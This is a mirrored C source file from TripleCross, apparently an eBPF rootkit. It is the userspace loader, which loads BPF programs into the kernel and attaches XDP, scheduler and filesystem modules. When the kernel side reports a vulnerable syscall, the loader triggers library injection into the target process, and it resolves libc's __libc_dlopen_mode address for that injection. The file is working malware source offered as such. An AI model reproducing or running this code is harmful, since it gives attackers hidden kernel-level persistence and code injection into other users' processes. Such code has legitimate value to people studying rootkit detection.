mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-20 16:53:07 +08:00
272 lines
6.5 KiB
C
272 lines
6.5 KiB
C
#include <argp.h>
|
|
#include <stdio.h>
|
|
#include <time.h>
|
|
#include <signal.h>
|
|
#include <sys/resource.h>
|
|
#include <bpf/libbpf.h>
|
|
#include <linux/if_link.h>
|
|
#include <net/if.h>
|
|
#include <unistd.h>
|
|
#include <dlfcn.h>
|
|
#include <link.h>
|
|
|
|
#include <bpf/bpf.h>
|
|
|
|
#include "kit.skel.h"
|
|
|
|
#include "../common/constants.h"
|
|
#include "../common/map_common.h"
|
|
#include "include/utils/files/path.h"
|
|
#include "include/utils/strings/regex.h"
|
|
#include "include/utils/structures/fdlist.h"
|
|
#include "include/modules/module_manager.h"
|
|
#include "include/utils/mem/injection.h"
|
|
#define ABORT_IF_ERR(err, msg)\
|
|
if(err<0){\
|
|
fprintf(stderr, msg);\
|
|
goto cleanup\
|
|
}
|
|
|
|
static struct env {
|
|
bool verbose;
|
|
} env;
|
|
|
|
void print_help_dialog(const char* arg){
|
|
|
|
printf("\nUsage: %s ./kit OPTION\n\n", arg);
|
|
printf("Program OPTIONs\n");
|
|
char* line = "-t[NETWORK INTERFACE]";
|
|
char* desc = "Activate XDP filter";
|
|
printf("\t%-40s %-50s\n\n", line, desc);
|
|
line = "-v";
|
|
desc = "Verbose mode";
|
|
printf("\t%-40s %-50s\n\n", line, desc);
|
|
line = "-h";
|
|
desc = "Print this help";
|
|
printf("\t%-40s %-50s\n\n", line, desc);
|
|
|
|
}
|
|
|
|
/*Wrapper for printing into stderr when debug active*/
|
|
static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args){
|
|
if (level == LIBBPF_DEBUG && !env.verbose)
|
|
return 0;
|
|
return vfprintf(stderr, format, args);
|
|
}
|
|
|
|
/**
|
|
* Increases kernel internal memory limit
|
|
* necessary to allocate resouces like BPF maps.
|
|
*/
|
|
static void bump_memlock_rlimit(void){
|
|
struct rlimit rlim_new = {
|
|
.rlim_cur = RLIM_INFINITY,
|
|
.rlim_max = RLIM_INFINITY,
|
|
};
|
|
|
|
if (setrlimit(RLIMIT_MEMLOCK, &rlim_new)) {
|
|
fprintf(stderr, "Failed to increase RLIMIT_MEMLOCK limit!\n");
|
|
exit(1);
|
|
}
|
|
}
|
|
|
|
static volatile bool exiting = false;
|
|
|
|
static void sig_handler(int sig){
|
|
exiting = true;
|
|
}
|
|
|
|
/**
|
|
* @brief Manages an event received via the ring buffer
|
|
* It's a message from th ebpf program
|
|
*
|
|
* @param ctx
|
|
* @param data
|
|
* @param data_sz
|
|
* @return int
|
|
*/
|
|
static int handle_rb_event(void *ctx, void *data, size_t data_size){
|
|
const struct rb_event *e = data;
|
|
|
|
//For time displaying
|
|
struct tm *tm;
|
|
char ts[32];
|
|
time_t t;
|
|
time(&t);
|
|
tm = localtime(&t);
|
|
strftime(ts, sizeof(ts), "%H:%M:%S", tm);
|
|
|
|
//Before parsing any data, check the type
|
|
if(e->event_type == INFO){
|
|
printf("%s INFO pid:%d code:%i, msg:%s\n", ts, e->pid, e->code, e->message);
|
|
}else if(e->event_type == DEBUG){
|
|
|
|
}else if(e->event_type == ERROR){
|
|
|
|
}else if(e->event_type == EXIT){
|
|
|
|
}else if(e->event_type == VULN_SYSCALL){
|
|
//eBPF detected syscall which can lead to library injection
|
|
printf("%s VULN_SYSCALL pid:%d syscall:%llx, return:%llx, libc_main:%llx, libc_dlopen_mode:%llx, libc_malloc:%llx, got:%llx, relro:%i\n", ts, e->pid, e->syscall_address, e->process_stack_return_address, e->libc_main_address, e->libc_dlopen_mode_address, e->libc_malloc_address, e->got_address, e->relro_active);
|
|
if(manage_injection(e)<0){
|
|
printf("Library injection failed\n");
|
|
}
|
|
}else{
|
|
printf("UNRECOGNIZED RB EVENT RECEIVED");
|
|
return -1;
|
|
}
|
|
|
|
return 0;
|
|
}
|
|
|
|
|
|
int main(int argc, char**argv){
|
|
struct ring_buffer *rb = NULL;
|
|
struct kit_bpf *skel;
|
|
__u32 err;
|
|
|
|
//Ready to be used
|
|
/*for (int arg = 1; arg < argc; arg++) {
|
|
if (load_fd_kmsg(argv[arg])) {
|
|
fprintf(stderr, "%s.\n", strerror(errno));
|
|
return EXIT_FAILURE;
|
|
}
|
|
}*/
|
|
|
|
__u32 ifindex;
|
|
|
|
/* Parse command line arguments */
|
|
int opt;
|
|
while ((opt = getopt(argc, argv, ":t:vh")) != -1) {
|
|
switch (opt) {
|
|
case 't':
|
|
ifindex = if_nametoindex(optarg);
|
|
printf("Activating filter on network interface: %s\n", optarg);
|
|
if(ifindex == 0){
|
|
perror("Error on input interface");
|
|
exit(EXIT_FAILURE);
|
|
}
|
|
break;
|
|
case 'v':
|
|
//Verbose output
|
|
env.verbose = true;
|
|
break;
|
|
|
|
case 'h':
|
|
print_help_dialog(argv[0]);
|
|
exit(0);
|
|
break;
|
|
case '?':
|
|
printf("Unknown option: %c\n", optopt);
|
|
exit(EXIT_FAILURE);
|
|
break;
|
|
case ':':
|
|
printf("Missing arguments for %c\n", optopt);
|
|
exit(EXIT_FAILURE);
|
|
break;
|
|
|
|
default:
|
|
print_help_dialog(argv[0]);
|
|
exit(EXIT_FAILURE);
|
|
}
|
|
}
|
|
|
|
//Set up libbpf errors and debug info callback
|
|
libbpf_set_print(libbpf_print_fn);
|
|
|
|
// Bump RLIMIT_MEMLOCK to be able to create BPF maps
|
|
bump_memlock_rlimit();
|
|
|
|
//Cleaner handling of Ctrl-C
|
|
signal(SIGINT, sig_handler);
|
|
signal(SIGTERM, sig_handler);
|
|
|
|
//Open and create BPF application in the kernel
|
|
skel = kit_bpf__open();
|
|
if (!skel) {
|
|
fprintf(stderr, "Failed to open and load BPF skeleton\n");
|
|
return 1;
|
|
}
|
|
|
|
//Load & verify BPF program
|
|
err = kit_bpf__load(skel);
|
|
if (err) {
|
|
fprintf(stderr, "Failed to load and verify BPF skeleton\n");
|
|
goto cleanup;
|
|
}
|
|
|
|
//Attach XDP and sched modules using module manager
|
|
//and setup the parameters for the installation
|
|
//XDP
|
|
module_config.xdp_module.all = ON;
|
|
module_config_attr.xdp_module.flags = XDP_FLAGS_REPLACE;
|
|
module_config_attr.xdp_module.ifindex = ifindex;
|
|
//SCHED
|
|
module_config.sched_module.all = ON;
|
|
//FS
|
|
module_config.fs_module.all = ON;
|
|
|
|
module_config_attr.skel = skel;
|
|
err = setup_all_modules();
|
|
|
|
// Set up ring buffer polling --> Main communication buffer kernel->user
|
|
rb = ring_buffer__new(bpf_map__fd(skel->maps.rb_comm), handle_rb_event, NULL, NULL);
|
|
if (rb==NULL) {
|
|
err = -1;
|
|
fprintf(stderr, "Failed to create ring buffer\n");
|
|
goto cleanup;
|
|
}
|
|
|
|
struct link_map *lm;
|
|
off_t offset = 0;
|
|
unsigned long long dlopenAddr;
|
|
lm = dlopen("libc.so.6", RTLD_LAZY);
|
|
if(lm==0){
|
|
perror("Error obtaining libc symbols");
|
|
return -1;
|
|
}
|
|
dlopenAddr = (unsigned long long)dlsym((void*)lm, "__libc_dlopen_mode");
|
|
printf("libdl: %lx\n", lm->l_addr);
|
|
printf("dlopen: %llx\n", dlopenAddr);
|
|
offset = dlopenAddr - lm->l_addr;
|
|
printf("Offset: %lx\n", offset);
|
|
|
|
//Once we have the offset of libc we proceed to uprobe our target program
|
|
|
|
|
|
//Now wait for messages from ebpf program
|
|
printf("Filter set and ready\n");
|
|
while (!exiting) {
|
|
err = ring_buffer__poll(rb, 100 /* timeout, ms */);
|
|
|
|
//Checking if a signal occured
|
|
if (err == -EINTR) {
|
|
err = 0;
|
|
break;
|
|
}
|
|
if (err < 0) {
|
|
printf("Error polling ring buffer: %d\n", err);
|
|
break;
|
|
}
|
|
}
|
|
|
|
//Received signal to stop, detach program from network interface
|
|
/*err = detach_sched_all(skel);
|
|
if(err<0){
|
|
perror("ERR");
|
|
goto cleanup;
|
|
}
|
|
detach_xdp_all(skel);
|
|
if(err<0){
|
|
perror("ERR");
|
|
goto cleanup;
|
|
}*/
|
|
|
|
cleanup:
|
|
ring_buffer__free(rb);
|
|
//kit_bpf__destroy(skel);
|
|
if(err!=0) return -1;
|
|
|
|
return 0;
|
|
}
|